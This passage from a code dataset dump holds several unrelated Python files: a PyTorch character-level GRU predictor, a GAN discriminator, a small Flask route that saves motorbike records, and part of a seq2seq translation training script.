per', 'c'),\n ('Gazing proudly from its stoic perch ab', 'o'),\n ('Gazing proudly from its stoic perch abo', 'v'),\n ('Gazing proudly from its stoic perch above the moo', 'r'),\n ('Mons', 't'),\n ('Monst', 'r'),\n ('Monstrou', 's'),\n ('Monstrous si', 'z'),\n ('Monstrous size has no in', 't'),\n ('Monstrous size has no intrins', 'i'),\n ('Monstrous size has no intrinsic mer', 'i'),\n ('Monstrous size has no intrinsic meri', 't'),\n ('Monstrous size has no intrinsic merit, unl', 'e'),\n ('Monstrous size has no intrinsic merit, unless inor', 'd'),\n ('Monstrous size has no intrinsic merit, unless inordinat', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate e', 'x'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsan', 'g'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguinatio', 'n'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be co', 'n'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be con', 's'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be consid', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be conside', 'r'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be consider', 'e'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considere', 'd'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a vir', 't'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a virt', 'u'),\n ('Monstrous size has no intrinsic merit, unless inordinate exsanguination be considered a virtu', 'e'),\n]\nrandom.seed(447)\n\ndef get_vocab():\n vocab = set()\n file_list = os.listdir(DATA_DIR)\n for i, file in enumerate(file_list):\n with open(os.path.join(DATA_DIR, file)) as f:\n text = f.read()\n f_vocab = set(text)\n currlen = len(vocab)\n vocab.update(f_vocab)\n # print(\"{}/{} Added {} characters to vocab from {}\".format(i+1, len(file_list), len(vocab) - currlen, file))\n voc_list = list(vocab)\n voc_list.insert(0, '\\u2400')\n voc_string = ''.join(voc_list)\n\n print(\"{} total characters in vocab\".format(len(vocab)))\n return voc_string\n\nwith open(os.path.join(CURR_DIR, 'vocab.txt'), 'r') as f:\n vocab = f.read()\nNUM_CHARACTERS = len(vocab)\n\ndef time_since(since):\n s = time.time() - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n \ndef char_tensor(s: str):\n if torch.cuda.is_available():\n tensor = torch.zeros(len(s)).to(torch.int64).cuda('cuda')\n else:\n tensor = torch.zeros(len(s)).to(torch.int64)\n for c in range(len(s)):\n try:\n tensor[c] = vocab.index(s[c])\n except ValueError:\n tensor[c] = 0 # if not in vocab, use 0 as index. 0 indexes the null symbol in vocab\n return Variable(tensor)\n\nclass TrainData():\n def __init__(self, batch_size=BATCH_SIZE): \n self.batch_index = 0\n self.batch_size = batch_size\n data = []\n file_list = os.listdir(DATA_DIR)\n non_cuda_tensors = 0\n print(len(file_list), 'articles in the dataset')\n hundreth = len(file_list) // 100\n tenth = len(file_list) // 10\n for i, filename in enumerate(file_list):\n if (i+1) % tenth == 0:\n print('|', end='')\n elif (i+1) % hundreth == 0:\n print('-', end='')\n with open(os.path.join(DATA_DIR, filename), 'r') as f:\n for line in f:\n line = line.strip('\\n')\n if len(line) <= 1:\n continue\n elif len(line) > CHUNK_LEN:\n idx = 0\n while idx < len(line):\n if idx + CHUNK_LEN < len(line):\n chunk = line[idx:idx+CHUNK_LEN]\n else:\n chunk = line[idx:]\n tensor = char_tensor(chunk)\n if not tensor.is_cuda:\n non_cuda_tensors += 1\n data.append(tensor)\n idx += CHUNK_LEN\n else:\n tensor = char_tensor(line)\n if not tensor.is_cuda:\n non_cuda_tensors += 1\n data.append(tensor)\n random.shuffle(data)\n print(f'\\nNon-cuda tensors in dataset: {non_cuda_tensors}')\n print(f'Total tensors in dataset: {len(data)}')\n self.data = data\n def random_training_set(self):\n if self.batch_index + self.batch_size >= len(self.data):\n self.batch_index = 0\n return self.data[self.batch_index:]\n else:\n self.batch_index += self.batch_size\n return self.data[self.batch_index:self.batch_index + self.batch_size]\n\ndef get_tensor_embeddings(input_size, embedding_dim, vocab):\n embeddings = {}\n try:\n file = open(EMBEDDINGS_PATH, 'r')\n for line in file:\n raw = line.strip().split()\n #First value in the line is the character name the rest are float values\n embedValues = np.asarray(raw[1:], dtype=float)\n char = raw[0]\n embeddings[char] = embedValues\n except:\n pass\n \n if torch.cuda.is_available():\n tensor_embeddings = torch.normal(0,1,(input_size, embedding_dim)).cuda('cuda')\n else:\n tensor_embeddings = torch.normal(0,1,(input_size, embedding_dim))\n for i, char in enumerate(vocab):\n if char in embeddings:\n tensor_embeddings[i] = torch.Tensor(embeddings[char])\n return tensor_embeddings\n\nclass Model(nn.Module):\n def __init__(self, vocab=vocab, input_size=NUM_CHARACTERS, hidden_size=HIDDEN_SIZE, output_size=NUM_CHARACTERS, n_layers=NUM_LAYERS):\n super(Model, self).__init__()\n self.vocab = vocab\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.n_layers = n_layers\n tensor_embeddings = get_tensor_embeddings(input_size, EMBEDDING_DIM, self.vocab)\n self.encoder = nn.Embedding.from_pretrained(tensor_embeddings, freeze=False)\n self.gru = nn.GRU(EMBEDDING_DIM, hidden_size, n_layers)\n self.decoder = nn.Linear(hidden_size, output_size)\n \n def forward(self, inputchar, hidden):\n inputchar = self.encoder(inputchar.view(1, -1))\n output, hidden = self.gru(inputchar.view(1, 1, -1), hidden)\n output = self.decoder(output.view(1, -1))\n return output, hidden\n\n def init_hidden(self):\n if torch.cuda.is_available():\n return Variable(torch.zeros(self.n_layers, 1, self.hidden_size).cuda('cuda'))\n else:\n return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))\n\n def train_step(self, inp, criterion, optim,):\n self.zero_grad()\n loss = 0\n total_items = 0\n for i, line in enumerate(inp):\n if (i+1) % (BATCH_SIZE // 10) == 0:\n print('|', end='')\n elif (i+1) % (BATCH_SIZE // 100) == 0:\n print('-', end='')\n hidden = self.init_hidden()\n total_items += len(line) - 1\n for c in range(len(line) - 1):\n output, hidden = self(line[c], hidden)\n target = line[c + 1]\n # unsqueeze() is used to add dimension to the tensor\n loss += criterion(output, target.unsqueeze(dim=0))\n # Back propagation\n print(\"\\nUpdating weights\")\n loss.backward()\n optim.step()\n return loss.item() / total_items\n \n def predict(self, history='A'):\n self.eval()\n hidden = self.init_hidden()\n history_input = char_tensor(history)\n\n # Use priming string to \"build up\" hidden state\n for c in range(len(history) - 1):\n _, hidden = self(history_input[c], hidden)\n inp = history_input[-1]\n\n output, hidden = self(inp, hidden)\n # print(output, type(output))\n top_i = []\n for i in torch.argsort(output[0])[-3:]:\n top_i.append(i.item())\n \n # Add predicted character to string and use as next input\n predicted_chars = []\n for i in top_i:\n predicted_chars.append(self.vocab[i])\n self.train()\n return predicted_chars\n \n # test data is a tuple of strings. first string is history, next string is correct char\n def evaluate(self, test_data=test_data):\n total = len(test_data)\n correct = 0\n for history, next_char in test_data:\n preds = self.predict(history)\n if next_char in preds:\n correct += 1\n return correct / total\n\ndef run_train(model, train_data, work_dir):\n model.to(DEVICE)\n for param in model.parameters():\n if not param.is_cuda:\n print(\"Model not initialized as cuda\")\n break\n\n optim = torch.optim.Adam(model.parameters(), lr=0.0005)\n criterion = nn.CrossEntropyLoss()\n start = time.time()\n\n eps = 250\n with open(os.path.join(work_dir, 'train_log.txt'), 'w') as f:\n print(\"Training model\")\n for epoch in range(1, eps + 1):\n print(f\"Epoch {epoch}\")\n inp = train_data.random_training_set()\n loss = model.train_step(inp, criterion, optim)\n accuracy = (model.evaluate() * 100)\n epoch_summary = '[%s (%d %d%%) %.4f], Accuracy: %.3f%%' % (time_since(start), epoch, epoch / eps * 100, loss, accuracy)\n print(epoch_summary)\n f.write(epoch_summary)\n f.write('\\n')\n \n with open('model.checkpoint.pt', 'wb') as f:\n torch.save(model, f)\n\n for history, next_char in test_data:\n preds = model.predict(history)\n print(next_char, preds, history)", "sub_path": "src/monofile.py", "file_name": "monofile.py", "file_ext": "py", "file_size_in_byte": 10734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 81, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 114, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 120, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.normal", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.normal", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 193, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "name"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 285, "usage_type": "call"}, {"api_name": "os.path", "line_number": 285, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 298, "usage_type": "call"}]} +{"seq_id": "113815081", "text": "import torch\nimport numpy as np\nclass MyDiscriminator(torch.nn.Module):\n def __init__(self, img_shape):\n super(MyDiscriminator, self).__init__()\n self.hidden_dim = 128\n #int(np.prod(img_shape))\n self.model = torch.nn.Sequential( \n torch.nn.Conv2d(3, self.hidden_dim, 5, stride=2, padding=2), \n torch.nn.LeakyReLU(inplace=True),\n torch.nn.Conv2d(self.hidden_dim, self.hidden_dim * 2, 5, stride=2, padding=2),\n torch.nn.LeakyReLU(True),\n torch.nn.BatchNorm2d(self.hidden_dim * 2, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n torch.nn.Conv2d(2 * self.hidden_dim, 4 * self.hidden_dim, 5, stride=2, padding=2),\n torch.nn.LeakyReLU(True),\n )\n self.linear = torch.nn.Linear(4 * self.hidden_dim * 8 * 8, 1)\n \n def forward(self, img):\n #print(\"dis\")\n if(img.shape[1] != 3):\n img = img.transpose(3,2).transpose(2,1)\n out = self.model(img)\n #print(out.shape) \n out = out.view(img.shape[0], -1)\n #print(img.shape[0])\n #print(out.shape)\n out = self.linear(out)\n #print(out.shape) \n return out.squeeze(-1) ", "sub_path": "hw3/Discriminator.py", "file_name": "Discriminator.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn", "line_number": 3, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "645150938", "text": "from flask import Flask, render_template , request\r\nimport mlab\r\nfrom models.superbike import Bike\r\n\r\nmlab.connect()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/add_bike\", methods = [\"GET\",\"POST\"])\r\ndef add_bike():\r\n if request.method == \"GET\":\r\n return render_template(\"add_bike.html\")\r\n if request.method == \"POST\":\r\n form = request.form \r\n bikename = form[\"bikename\"]\r\n hangxe = form[\"hangxe\"]\r\n image = form[\"image\"]\r\n dongco = form[\"dongco\"]\r\n maluc = form[\"maluc\"]\r\n hopso = form[\"hopso\"]\r\n chieucaoyenxe = form[\"chieucaoyenxe\"]\r\n dacdiemkhac = form[\"dacdiemkhac\"]\r\n giaxe = form[\"giaxe\"]\r\n superbike = Bike(bikename = bikename,hangxe = hangxe, image = image ,dongco = dongco , maluc = maluc , hopso = hopso , chieucaoyenxe = chieucaoyenxe , dacdiemkhac = dacdiemkhac , giaxe = giaxe)\r\n superbike.save()\r\n return render_template(\"add_bike.html\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n\r\n\r\n# bike = Bike.objects.with_id(\"5c1bc34abd42b10f5051e379\")\r\n\r\n# bike.update(set__bikename = \" CB 500F\")\r\n# print(bike.bikename)\r\n ", "sub_path": "add_bike.py", "file_name": "add_bike.py", "file_ext": "py", "file_size_in_byte": 1146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "mlab.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "models.superbike.Bike", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "535598758", "text": "import numpy as np\nimport time\nimport os\nimport torch.nn as nn\nimport torch\nfrom torch import optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\nfrom Data_utils import VocabDataset, vocab_collate_func\nfrom preprocessing_util import preposs_toekn, Lang, text2index, construct_Lang\nfrom selfAtten_RNN_Encoder import Encoder\nfrom Multilayers_Decoder import DecoderAtten\nfrom selfatten_RNN_evaluation import evaluate_batch\nfrom config import device, PAD_token, SOS_token, EOS_token, UNK_token, embedding_freeze, vocab_prefix\nimport random\nimport pickle \nfrom SelfAtten_RNN_config import args\nfrom torch.optim.lr_scheduler import LambdaLR\n\n####################Define Global Variable#########################\n\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(device)\n\n####################Define Global Variable#########################\n\n\ndef train(input_tensor, input_lengths, target_tensor, target_lengths,\n encoder, decoder, encoder_optimizer, decoder_optimizer, criterion, \n teacher_forcing_ratio):\n '''\n finish train for a batch\n '''\n batch_size = input_tensor.size(0) \n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n loss = 0\n encoder_outputs, encoder_hidden, encoder_cell = encoder(input_tensor, input_lengths)\n\n decoder_input = torch.tensor([[SOS_token]*batch_size], device=device).transpose(0,1)\n decoder_hidden,decoder_cell = encoder_hidden, encoder_cell #decoder.initHidden(encoder_hidden)\n #print(decoder_hidden.size())\n #print('encoddddddddddder finishhhhhhhhhhhhhhh')\n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n\n if use_teacher_forcing:\n #### Teacher forcing: Feed the target as the next input\n # target_lengths = target_lengths.cpu().numpy()\n # sent_not_end_index = list(range(batch_size))\n # decoding_token_index = 0\n # while len(sent_not_end_index) > 0:\n # decoder_output, decoder_hidden, decoder_attention = decoder(\n # decoder_input, decoder_hidden, input_lengths, encoder_outputs)\n # sent_not_end_index = torch.LongTensor(sent_not_end_index).to(device)\n # loss += criterion(decoder_output.index_select(0,sent_not_end_index), \n # target_tensor[:,decoding_token_index].index_select(0,sent_not_end_index))\n # decoder_input = target_tensor[:,decoding_token_index].unsqueeze(1) # Teacher forcing\n # decoding_token_index += 1\n # end_or_not = target_lengths > decoding_token_index\n # sent_not_end_index = list(np.where(end_or_not)[0])\n ### simple version; \n decoding_token_index = 0\n tgt_max_len_batch = target_lengths.cpu().max().item()\n assert(tgt_max_len_batch==target_tensor.size(1))\n while decoding_token_index < tgt_max_len_batch:\n decoder_output, decoder_hidden, decoder_attention, decoder_cell = decoder(\n decoder_input, decoder_hidden, input_lengths, encoder_outputs, decoder_cell)\n loss += criterion(decoder_output, target_tensor[:,decoding_token_index])\n decoder_input = target_tensor[:,decoding_token_index].unsqueeze(1) # Teacher forcing\n decoding_token_index += 1\n\n else:\n ### debug \n # # Without teacher forcing: use its own predictions as the next input\n # target_lengths_numpy = target_lengths.cpu().numpy()\n # sent_not_end_index = list(range(batch_size))\n # decoding_token_index = 0\n # while len(sent_not_end_index) > 0:\n # decoder_output, decoder_hidden, decoder_attention_weights = decoder(\n # decoder_input, decoder_hidden, input_lengths, encoder_outputs)\n # topv, topi = decoder_output.topk(1)\n # decoder_input = topi.detach() # detach from history as input\n # #print(type(sent_not_end_index[0]))\n # sent_not_end_index = torch.LongTensor(sent_not_end_index).to(device)\n # loss += criterion(decoder_output.index_select(0,sent_not_end_index), \n # target_tensor[:,decoding_token_index].index_select(0,sent_not_end_index))\n # decoding_token_index += 1\n # end_or_not = target_lengths_numpy > decoding_token_index\n # #(target_lengths_numpy > decoding_token_index)*(decoder_input.squeeze().numpy() != EOS_token)\n # sent_not_end_index = list(np.where(end_or_not)[0])\n ### simple version\n decoding_token_index = 0\n tgt_max_len_batch = target_lengths.cpu().max().item()\n assert(tgt_max_len_batch==target_tensor.size(1))\n while decoding_token_index < tgt_max_len_batch:\n decoder_output, decoder_hidden, decoder_attention_weights, decoder_cell = decoder(\n decoder_input, decoder_hidden, input_lengths, encoder_outputs, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.detach() # detach from history as input\n loss += criterion(decoder_output, target_tensor[:,decoding_token_index])\n decoding_token_index += 1\n\n \n # average loss \n #target_lengths.type_as(loss).mean()\n loss.backward()\n\n ### TODO\n # clip for gradient exploding \n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return loss.item()/tgt_max_len_batch #torch.div(loss, target_lengths.type_as(loss).mean()).item() #/target_lengths.mean()\n\n\ndef trainIters(train_loader, val_loader, encoder, decoder, num_epochs, \n learning_rate, teacher_forcing_ratio, srcLang, tgtLang, model_save_info, tgt_max_len, beam_size):\n\n encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-09)\n decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate, betas=(0.9, 0.98), eps=1e-09)\n\n if model_save_info['model_path_for_resume'] is not None:\n check_point_state = torch.load(model_save_info['model_path_for_resume'])\n encoder.load_state_dict(check_point_state['encoder_state_dict'])\n encoder_optimizer.load_state_dict(check_point_state['encoder_optimizer_state_dict'])\n decoder.load_state_dict(check_point_state['decoder_state_dict'])\n decoder_optimizer.load_state_dict(check_point_state['decoder_optimizer_state_dict'])\n \n lr_decay = False\n def lr_foo(step,warmup_steps = 4000):\n if step < 500:\n return 0.001/(step+1)\n else:\n return 1.0/np.sqrt(args['encoder_embed_dim'])* min(1.0/np.sqrt(step), step*warmup_steps**(-1.5))\n \n criterion = nn.NLLLoss() #nn.NLLLoss(ignore_index=PAD_token)\n max_val_bleu = 0\n \n if lr_decay:\n lambda_T = lambda step: lr_foo(step)\n scheduler_encoder = LambdaLR(encoder_optimizer, lr_lambda=lambda_T)\n scheduler_decoder = LambdaLR(decoder_optimizer, lr_lambda=lambda_T)\n \n for epoch in range(num_epochs): \n n_iter = -1\n start_time = time.time()\n for input_tensor, input_lengths, target_tensor, target_lengths in train_loader:\n n_iter += 1\n \n if lr_decay:\n scheduler_encoder.step()\n scheduler_decoder.step()\n #print('start_step: ', n_iter)\n loss = train(input_tensor, input_lengths, target_tensor, target_lengths, \n encoder, decoder, encoder_optimizer, decoder_optimizer, \n criterion, teacher_forcing_ratio)\n if n_iter % 200 == 0:\n print('Loss:', loss)\n #eva_start = time.time()\n #val_bleu_sacre, val_bleu_nltk, val_loss = evaluate_batch(val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word, srcLang.index2word)\n #print((time.time()-eva_start)/60)\n #print('epoch: [{}/{}], step: [{}/{}], train_loss:{}, val_bleu_sacre: {}, val_bleu_nltk: {}, val_loss: {}'.format(\n # epoch, num_epochs, n_iter, len(train_loader), loss, val_bleu_sacre[0], val_bleu_nltk, val_loss))\n # print('Decoder parameters grad:')\n # for p in decoder.named_parameters():\n # print(p[0], ': ', p[1].grad.data.abs().mean().item(), p[1].grad.data.abs().max().item(), p[1].data.abs().mean().item(), p[1].data.abs().max().item(), end=' ')\n # print('\\n')\n # print('Encoder Parameters grad:')\n # for p in encoder.named_parameters():\n # print(p[0], ': ', p[1].grad.data.abs().mean().item(), p[1].grad.data.abs().max().item(), p[1].data.abs().mean().item(), p[1].data.abs().max().item(), end=' ')\n # print('\\n')\n val_bleu_sacre, val_bleu_nltk, val_loss = evaluate_batch(val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word, srcLang.index2word)\n print('epoch: [{}/{}] (Running time {:.3f} min), val_bleu_sacre: {}, val_bleu_nltk: {}, val_loss: {}'.format(epoch, num_epochs, (time.time()-start_time)/60, val_bleu_sacre, val_bleu_nltk, val_loss))\n #val_bleu_sacre_beam, _, _ = evaluate_beam_batch(beam_size, val_loader, encoder, decoder, criterion, tgt_max_len, tgtLang.index2word)\n #print('epoch: [{}/{}] (Running time {:.3f} min), val_bleu_sacre_beam: {}'.format(epoch, num_epochs, (time.time()-start_time)/60, val_bleu_sacre_beam))\n if max_val_bleu < val_bleu_sacre.score:\n max_val_bleu = val_bleu_sacre.score\n ### TODO save best model\n if (epoch+1) % model_save_info['epochs_per_save_model'] == 0:\n check_point_state = {\n 'epoch': epoch,\n 'encoder_state_dict': encoder.state_dict(),\n 'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),\n 'decoder_state_dict': decoder.state_dict(),\n 'decoder_optimizer_state_dict': decoder_optimizer.state_dict()\n }\n torch.save(check_point_state, '{}epoch_{}.pth'.format(model_save_info['model_path'], epoch))\n\n return None\n \n\ndef start_train(transtype, paras):\n src_max_vocab_size = paras['src_max_vocab_size']\n tgt_max_vocab_size = paras['tgt_max_vocab_size']\n tgt_max_len = paras['tgt_max_len']\n max_src_len_dataloader = paras['max_src_len_dataloader']\n max_tgt_len_dataloader = paras['max_tgt_len_dataloader']\n\n teacher_forcing_ratio = paras['teacher_forcing_ratio']\n emb_size = paras['emb_size']\n hidden_size = paras['hidden_size']\n num_layers = paras['num_layers']\n num_direction = paras['num_direction']\n deal_bi = paras['deal_bi']\n learning_rate = paras['learning_rate']\n num_epochs = paras['num_epochs']\n batch_size = paras['batch_size']\n rnn_type = paras['rnn_type']\n attention_type = paras['attention_type']\n beam_size = paras['beam_size']\n model_save_info = paras['model_save_info']\n dropout_rate = paras['dropout_rate']\n\n address_book=dict(\n train_src = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/train.tok.{}'.format(transtype[0], transtype[1], transtype[0]),\n train_tgt = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/train.tok.{}'.format(transtype[0], transtype[1], transtype[1]),\n val_src = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/dev.tok.{}'.format(transtype[0], transtype[1], transtype[0]),\n val_tgt = 'Machine_Translation_NLP/iwsltzhen/iwslt-{}-{}/dev.tok.{}'.format(transtype[0], transtype[1], transtype[1]),\n src_emb = 'embedding/wiki.{}.vec'.format(transtype[0]),\n tgt_emb = 'embedding/wiki.{}.vec'.format(transtype[1])\n )\n #print(address_book)\n train_src_add = address_book['train_src']\n train_tgt_add = address_book['train_tgt']\n val_src_add = address_book['val_src']\n val_tgt_add = address_book['val_tgt']\n # make dir for saving models\n if not os.path.exists(model_save_info['model_path']):\n os.makedirs(model_save_info['model_path'])\n ### save model hyperparameters\n with open(model_save_info['model_path']+'model_params.pkl', 'wb') as f:\n model_hyparams = paras\n model_hyparams['address_book'] = address_book\n pickle.dump(model_hyparams, f)\n print(model_hyparams)\n\n train_src = []\n with open(train_src_add) as f:\n for line in f:\n train_src.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n train_tgt = []\n with open(train_tgt_add) as f:\n for line in f:\n train_tgt.append(preposs_toekn(line[:-1].strip().split(' ')))\n \n val_src = []\n with open(val_src_add) as f:\n for line in f:\n val_src.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n val_tgt = []\n with open(val_tgt_add) as f:\n for line in f:\n val_tgt.append(preposs_toekn(line[:-1].strip().split(' ')))\n\n print('The number of train samples: ', len(train_src))\n print('The number of val samples: ', len(val_src))\n srcLang = construct_Lang('src', src_max_vocab_size, address_book['src_emb'], train_src)\n tgtLang = construct_Lang('tgt', tgt_max_vocab_size, address_book['tgt_emb'], train_tgt)\n train_input_index = text2index(train_src, srcLang.word2index) #add EOS token here \n train_output_index = text2index(train_tgt, tgtLang.word2index)\n val_input_index = text2index(val_src, srcLang.word2index)\n val_output_index = text2index(val_tgt, tgtLang.word2index)\n ### save srcLang and tgtLang\n\n train_dataset = VocabDataset(train_input_index,train_output_index, max_src_len_dataloader, max_tgt_len_dataloader)\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n collate_fn=vocab_collate_func,\n shuffle=True)\n\n val_dataset = VocabDataset(val_input_index,val_output_index, None, None)\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n collate_fn=vocab_collate_func,\n shuffle=False)\n\n # test_dataset = VocabDataset(test_data)\n # test_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n # batch_size=BATCH_SIZE,\n # collate_fn=vocab_collate_func,\n # shuffle=False)\n\n embedding_src_weight = torch.from_numpy(srcLang.embedding_matrix).type(torch.FloatTensor).to(device)\n embedding_tgt_weight = torch.from_numpy(tgtLang.embedding_matrix).type(torch.FloatTensor).to(device)\n print(embedding_src_weight.size(), embedding_tgt_weight.size())\n if attention_type:\n encoder = Encoder(args, num_layers, vocab_size = srcLang.vocab_size, use_position_emb = False)\n decoder = DecoderAtten(emb_size, hidden_size, tgtLang.vocab_size, num_layers, rnn_type = rnn_type, atten_type = 